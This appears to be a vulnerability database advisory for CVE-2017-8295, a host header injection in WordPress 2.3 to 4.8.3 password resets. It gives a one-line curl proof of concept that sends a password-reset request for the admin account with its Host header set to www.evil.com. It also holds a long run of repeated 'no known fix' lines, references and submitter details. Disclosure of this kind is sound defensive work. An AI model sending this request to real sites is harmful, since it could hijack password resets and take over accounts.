WordPress 2.3-4.8.3 - Host Header Injection in Password Reset



Description
Attacker may be able to set the 'From' email header in password reset emails.
Proof of Concept
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Affects WordPresses

no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix
no known fix

References

CVE 2017-8295
URL https://core.trac.wordpress.org/ticket/25239
URL https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
URL https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html

Classification

Type UNKNOWN

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter dewhurstsec
Views 18802
Verified No
WPVDB ID 8807

Timeline

Publicly Published 2017-05-03 (almost 3 years ago)
Added 2017-05-05 (almost 3 years ago)
Last Updated 2019-11-01 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin